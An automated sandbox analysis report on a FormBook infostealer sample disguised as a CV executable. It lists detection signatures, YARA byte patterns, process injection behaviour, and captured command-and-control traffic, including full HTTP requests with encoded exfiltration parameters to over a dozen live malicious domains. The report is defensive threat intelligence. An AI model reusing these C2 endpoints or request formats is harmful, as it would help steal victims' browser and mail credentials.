Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Curriculum Vitae Catalina Munoz.exe

Overview

General Information

Sample name:Curriculum Vitae Catalina Munoz.exe
Analysis ID:1447923
MD5:1f690a7d24c0c325d681db7d114520d4
SHA1:cb3b2bcbfac8d1426d1c9c77294bbb8eff766be0
SHA256:af04493ff5e1ece516e1a68ba430e7b280a0bb3a7671433e357612b510ca98fb
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Curriculum Vitae Catalina Munoz.exe (PID: 4048 cmdline: "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe" MD5: 1F690A7D24C0C325D681DB7D114520D4)
    • Curriculum Vitae Catalina Munoz.exe (PID: 4024 cmdline: "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe" MD5: 1F690A7D24C0C325D681DB7D114520D4)
      • OZCzxhvCDDlUqJnCoH.exe (PID: 400 cmdline: "C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TSTheme.exe (PID: 7500 cmdline: "C:\Windows\SysWOW64\TSTheme.exe" MD5: 6634A157115551E6DDDFB4748C0565FB)
          • OZCzxhvCDDlUqJnCoH.exe (PID: 6704 cmdline: "C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7720 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2de93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x174d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ab60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2de93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x174d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d093:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x166d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:05/27/24-12:34:06.769299
            SID:2855465
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Curriculum Vitae Catalina Munoz.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.duobao698.com/ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0YAvira URL Cloud: Label: malware
            Source: http://www.gett.hu/1df8/Avira URL Cloud: Label: malware
            Source: http://www.drdavidglassman.com/61qh/Avira URL Cloud: Label: malware
            Source: http://www.lets-goo.ru/jcz4/Avira URL Cloud: Label: malware
            Source: http://www.duobao698.com/ff4v/Avira URL Cloud: Label: malware
            Source: http://www.drdavidglassman.com/61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0YAvira URL Cloud: Label: malware
            Source: http://www.lets-goo.ru/jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0YAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: duobao698.comVirustotal: Detection: 5%Perma Link
            Source: gett.huVirustotal: Detection: 5%Perma Link
            Source: http://www.drdavidglassman.com/61qh/Virustotal: Detection: 7%Perma Link
            Source: http://www.duobao698.com/ff4v/Virustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Curriculum Vitae Catalina Munoz.exeReversingLabs: Detection: 63%
            Source: Curriculum Vitae Catalina Munoz.exeVirustotal: Detection: 56%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Curriculum Vitae Catalina Munoz.exeJoe Sandbox ML: detected
            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1377872255.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662366685.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: TSTheme.pdb source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Curriculum Vitae Catalina Munoz.exe, Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: TSTheme.pdbGCTL source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FDBE90 FindFirstFileW,FindNextFileW,FindClose,15_2_02FDBE90
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 4x nop then jmp 07891CE1h0_2_07891317
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 4x nop then xor eax, eax15_2_02FC96D0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 4x nop then pop edi15_2_02FD23FD

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49710 -> 124.156.151.111:80
            Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /y4a0/?4h=SNHD3K3PParXHnkwUXmJyoZGSKzPVxiMFdor0NFDe3qARdFDsr6bi2Hm1bNI3aFCJ45VE8SHGaBHgDSe2Sonpz6bDHAjQ/z+aswAPE+xiOEsS724wCH7dMecgb+s+6E26U1cI5uvI0Mp&623=YLI8v8eXd0Y HTTP/1.1Host: www.crxwdix.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /1df8/?4h=HKzVUqf1aEuVi+2sXpcO0QRiAr3gocmC4R78U/lSG5GPWeqrEM/dj7KCi/m7j8wlbFRbxXaftyt8S80LR8LDtnhaMK2/eM8I7y9bqMxgYhPG1v0QEsNv7Olz+oqDA3TDqZmGkZkE9/dY&623=YLI8v8eXd0Y HTTP/1.1Host: www.gett.huAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0Y HTTP/1.1Host: www.lets-goo.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /o2z4/?4h=o4btfdz60D114qnlpPkAL4ysHPNnnpnlNvMaE18djeqdyh8JxI4to+dkcTQv5jDwTFNUiMSIZUwmUqoSbZzkAVBLptEej4dkSw0Rp5qMw46dSxiTGxGYdrzYQnQsEiM3dvL1u5YQIt8O&623=YLI8v8eXd0Y HTTP/1.1Host: www.emgeecontracting.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Y HTTP/1.1Host: www.duobao698.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0Y HTTP/1.1Host: www.drdavidglassman.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /faug/?4h=gQ1rcTKRTEdEYijsQ7RFFauKs4+hYTESjtLv7rh/BlgU+Ddcsh0s2+qhlb94LlvEhZt7Uc7VfShGPHZ40PDTJ1kF4z42d0MBHK6AIRS14RYMt5cJ4UQYX3B6sCkK/z4FUX6qhl+TCqln&623=YLI8v8eXd0Y HTTP/1.1Host: www.friendsfavorites.petAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /arkx/?4h=izrOBqjDGn6K81VAqiLvdxq7h8n9iXY4J1uyWiaqUuNHOvNf2Hoypk/h4at0tdb9bQxTH+Zf8GFGMv9cn3TC2h6uZHILfUjXpIKlVyIf/DctIe5AU17J5zebd8IAEKXGkCDEtoBzkAdY&623=YLI8v8eXd0Y HTTP/1.1Host: www.featuringnature.deAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /nsxv/?4h=pYuJRq+8cLDcL7HBjbC+/g/Mh4BWEuLgiK2rXGhb3IwhxBD1Y9l6lru26CW/IEGwQ6X80EHXbCPAETHU89p1owS3Fy9cgcx9jNYuN7s7s2Oj/CYEgsKi16b0MMZfzW5XOEPuTfm+FgSa&623=YLI8v8eXd0Y HTTP/1.1Host: www.kohfour.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /sdqf/?4h=/Um9ojVdkbfnISaoGVsuQzSOUzKaaLgSbEiIsV4+zKdo/XoiJWjCg4n0fCMWfuuxI3x/+HlmtSdoreUzjia5ktzQg+QfuhD9Tyqg/FbSK60Z9xhxRrThQnyA3fP8fU7MydtKBAbYK1CU&623=YLI8v8eXd0Y HTTP/1.1Host: www.getmall.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /yfa0/?4h=0WhDsKDlEsw2U2hGDN8VHtGa3OHmwnAep36jQbkxMA/yUt9OY1uk5sHeApFDjZn3CMzAWurlvftixp+c+vBUGrqZNxyLTULtMs5Dxygy6ogz213YpKfivi2Kz6VhB8QL1f0m+iF6WOns&623=YLI8v8eXd0Y HTTP/1.1Host: www.uqdr.cnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA+OY5sgrADNPU0JrQkM0waXTw1UtcTvO26zHEpWIbySxhuqYeEN75iL48Y+nSKxcRhJvbqJM0ozumkczTZ0r6h/7BELTqwTup5gX3mE&623=YLI8v8eXd0Y HTTP/1.1Host: www.kernelphysics.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /zxqv/?4h=OundE2exmel4zoR2h8DaiP5rA6rWpfsTmCodHa3wAeftE7HOQeIovEJMwiGRwn5EG1Ay+Vr7sNzWsvI7Z9ouBjSqQ9kX1TTXpDayR3bilNm8LgIuib/ea4tO/6BxMsTG0spQdKgoBIvM&623=YLI8v8eXd0Y HTTP/1.1Host: www.theppelin.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /xvcs/?4h=C9I48TAnIDWUJjArfDMWJdViUh6nNPGow05e1uC1tfhZsbhFFmHmX4wCjHXOtJR+EmF88tR6GQ9yogFnvhAEpy/ktKFnGfRg/4wLMWSu7Ir3MPWPBJr4ouRSVqpeqHbqcPt/HmBjByDG&623=YLI8v8eXd0Y HTTP/1.1Host: www.botcsllc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /wy0r/?4h=WzjQ5Lku/CcVmfYMLh2se4NW5p5EcwqyA3YiOMIwT77nsakaLKShRywTCni07+Ypglha0We7/XFNEOgzZwpW0Iau+HgTJhKyqKoR5usZjmbjCMnZJqH26R2XpANM+dd2J9nsS8vZ76/r&623=YLI8v8eXd0Y HTTP/1.1Host: www.shengniu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: www.crxwdix.store
            Source: global trafficDNS traffic detected: DNS query: www.gett.hu
            Source: global trafficDNS traffic detected: DNS query: www.lets-goo.ru
            Source: global trafficDNS traffic detected: DNS query: www.emgeecontracting.shop
            Source: global trafficDNS traffic detected: DNS query: www.duobao698.com
            Source: global trafficDNS traffic detected: DNS query: www.drdavidglassman.com
            Source: global trafficDNS traffic detected: DNS query: www.friendsfavorites.pet
            Source: global trafficDNS traffic detected: DNS query: www.featuringnature.de
            Source: global trafficDNS traffic detected: DNS query: www.kohfour.com
            Source: global trafficDNS traffic detected: DNS query: www.getmall.online
            Source: global trafficDNS traffic detected: DNS query: www.uqdr.cn
            Source: global trafficDNS traffic detected: DNS query: www.kernelphysics.com
            Source: global trafficDNS traffic detected: DNS query: www.theppelin.online
            Source: global trafficDNS traffic detected: DNS query: www.botcsllc.com
            Source: global trafficDNS traffic detected: DNS query: www.shengniu.com
            Source: unknownHTTP traffic detected: POST /1df8/ HTTP/1.1Host: www.gett.huAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.gett.huConnection: closeContent-Length: 215Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.gett.hu/1df8/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2Data Raw: 34 68 3d 4b 49 62 31 58 63 7a 32 62 30 61 71 74 59 47 77 53 62 49 55 75 43 67 58 48 72 7a 44 73 38 69 45 37 42 76 6b 5a 4d 70 41 50 65 62 63 57 4b 61 4d 58 62 37 35 6c 4c 57 67 2b 39 4f 44 73 74 63 32 42 32 4a 6a 78 46 4b 6c 77 53 6f 49 4a 76 51 6c 52 35 33 36 77 45 64 52 4d 49 71 59 63 65 49 30 32 56 35 73 30 75 46 66 47 77 2b 51 79 59 6f 55 43 2f 74 6f 79 76 42 32 38 64 50 36 58 31 65 6e 74 73 7a 56 73 37 4d 4e 6f 63 64 65 74 6a 4f 57 7a 59 63 